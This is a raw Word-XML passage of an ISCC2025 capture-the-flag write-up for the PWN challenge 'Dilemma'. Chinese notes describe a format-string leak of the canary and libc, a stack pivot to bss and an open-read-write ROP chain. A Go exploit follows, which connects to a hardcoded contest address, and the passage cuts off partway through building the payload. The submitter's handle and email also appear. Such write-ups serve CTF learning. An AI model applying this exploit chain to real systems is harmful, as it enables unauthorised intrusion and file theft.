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FF4424">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>SCC2025 WriteUp 提交模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED1247">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>吊椅宝宝赚钱养小猫+习翼+1962389612@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CA60B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PWN+Dilemma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C6088">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>64位 Canary nx保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955C75B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1183005"/>
            <wp:effectExtent l="0" t="0" r="1270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33ED7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3460750" cy="3702050"/>
            <wp:effectExtent l="0" t="0" r="190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075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15E0D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21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 w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">有 func_1 、func_0两个函数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4D268">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3975100" cy="4629150"/>
            <wp:effectExtent l="0" t="0" r="12700" b="190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B0AC7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21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 w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Func_1 格式化字符串漏洞来泄露canary和libc ，func1第二个输入可以随便输，输完后退出func1，输入2进入func0</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="678800E4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4279900" cy="1054100"/>
            <wp:effectExtent l="0" t="0" r="12700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4BA34">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>由于execve被禁用，我们决定采用orw攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F653131">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Func0接受的输入长度为0x100字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04722B7C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>通过Func_0实现直接的栈迁移，进而执行orw攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D779E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>首先将控制权迁移到bss段，然后将./flag.txt字符串写入bss段上方，利用0x100字节的输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A0ACD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>最终通过覆盖返回地址来完成orw攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D45276">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5219700" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="1270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8A609">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B2606B"/>
    <w:p w14:paraId="79878D88">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp（如有，请粘贴完整代码，不允许截图！）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F259A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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03DC44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324D4F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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EC09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"bufio"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28067F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"encoding/binary"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE46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"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E84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"net"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF02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"strconv"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E4F1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"strings"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236DDF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"time"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEA6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37AEE335">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32003D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 main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADF6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Constants from the original script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232908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const (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373199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remoteAddr      = "101.200.155.151:12500"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123087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popRdi          = 0x000000000040119a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1E06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             = 0x000000000040101a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691FC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bss             = 0x404000 + 0x900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAAE1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popRsiR15       = 0x000000000040119c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F75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again           = 0x4012BA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EEA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popRdxR12Offset = 0x000000000011f2e7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FE87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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7ACD8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD0C3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Connect to the remote server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E13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conn, err := net.DialTimeout("tcp", remoteAddr, 10*time.Second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26009B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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA70C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fmt.Printf("Failed to connect: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B8B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE72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6864D2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defer conn.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E6952">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604330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Set up buffered reader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68AB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reader := bufio.NewReader(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E38EDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C55E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Read until "where are you go?\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C69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_, err := readUntil(reader, "where are you go?\n"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7F0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fmt.Printf("Failed to read prompt: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB09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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220AA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212CEBA0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE290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Send "1\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CBF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_, err := conn.Write([]byte("1\n")); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0786F3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fmt.Printf("Failed to send choice: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A54F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE91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1F3AF4C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492528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Read until "Enter you password:\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646006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_, err := readUntil(reader, "Enter you password:\n"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C19F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fmt.Printf("Failed to read password prompt: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65C4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7068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4B4449D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE7E5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Send format string payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C374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payload1 := []byte("%39$p%11$p\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172145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_, err := conn.Write(payload1); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299C1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fmt.Printf("Failed to send payload1: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF49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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DA5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659F4EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CFEAA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Read and parse libc_start and canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A9A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libcStartStr, err := readUntil(reader, "0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DEE5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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B59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fmt.Printf("Failed to read libc start prefix: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B35F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC80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6CF7B8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libcStartBytes, err := readNBytes(reader, 12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EE5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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28165D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fmt.Printf("Failed to read libc start: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0777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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D8D6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29E6E8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libcStart, err := strconv.ParseInt(string(libcStartBytes), 16, 64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE78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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616FEB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fmt.Printf("Failed to parse libc start: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E14C3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0658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2B1EC9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libcBase := libcStart - 128 - 0x27000 // Adjust for __libc_start_main offset (approximated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54913891">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE50E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canaryStr, err := readUntil(reader, "0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0633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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A40A8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fmt.Printf("Failed to read canary prefix: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1FFD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50D5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460B89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canaryBytes, err := readNBytes(reader, 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555793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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701E0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fmt.Printf("Failed to read canary: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567CA6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD56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3C86CB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canary, err := strconv.ParseInt(string(canaryBytes), 16, 64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCBD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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E001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fmt.Printf("Failed to parse canary: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C02B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521AD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2E4A147F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43580D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Read until "I will check your password:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F693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_, err := readUntil(reader, "I will check your password:"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4FE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fmt.Printf("Failed to read check password prompt: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B99F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233184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79621733">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245246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Send 8-byte padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677845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_, err := conn.Write([]byte("a\x00\x00\x00\x00\x00\x00\x00\n")); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F37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fmt.Printf("Failed to send padding: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC8C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F1B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2549B9CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5904B1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Read until "where are you go?\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570238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_, err := readUntil(reader, "where are you go?\n"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67C6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fmt.Printf("Failed to read second prompt: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A43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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557A1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0F505CF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EAAC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Send "2\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F267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_, err := conn.Write([]byte("2\n")); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7F6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fmt.Printf("Failed to send second choice: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767393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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F71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64419225">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704B92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Read until "We have a lot to talk about\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB26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_, err := readUntil(reader, "We have a lot to talk about\n"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F887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fmt.Printf("Failed to read talk prompt: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1AF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D55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7A564223">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AF0B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Construct first payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350EF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payload2 := make([]byte, 0, 0x40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6675C8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payload2 = append(payload2, []byte("a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")...) // 0x28 bytes of 'a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0790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payload2 = append(payload2, p64(uint64(canary))...)                                                                 // Canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12743E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payload2 = append(payload2, p64(bss+0x30)...)                                                                      // Dummy RBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A437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payload2 = append(payload2, p64(0x4011C9)...)                                                                      // Return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7AC7BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598A4D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Send first payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047DC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_, err := conn.Write(payload2); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02620C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fmt.Printf("Failed to send payload2: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D15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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1AF8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11EBC1FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300473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Read until 0x28 'a's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C088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_, err := readUntil(reader, strings.Repeat("a", 0x28)); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF97A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fmt.Printf("Failed to read padding echo: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B5D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D353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50338676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E4B7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Hardcoded libc offsets (approximated based on typical libc.so.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248F6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const (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501F1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openOffset  = 0x10f4b0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B77F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readOffset  = 0x10f4e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213908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writeOffset = 0x10f540</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0766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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0832BF13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC22B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Construct second payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D2A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payload3 := make([]byte, 0, 0x100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B7B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payload3 = append(payload3, []byte("./flag.txt")...) // Flag file path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF08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payload3 = append(payload3, make([]byte, 0x28-len("./flag.txt"))...) // Pad to 0x28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1875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payload3 = append(payload3, p64(uint64(canary))...)                  // Canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DD1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payload3 = append(payload3, p64(0)...)                              // Dummy RBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536C5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open("./flag.txt", 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D85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payload3 = append(payload3, p64(popRdi)...)                         // pop rdi; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB902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payload3 = append(payload3, p64(bss)...)                            // bss (./flag.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C627B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payload3 = append(payload3, p64(popRsiR15)...)                      // pop rsi; pop r15; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FEFE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payload3 = append(payload3, p64(0)...)                              // rsi = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD2F6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payload3 = append(payload3, p64(0)...)                              // r15 = 0</w:t>
      </w:r>
    </w:p>
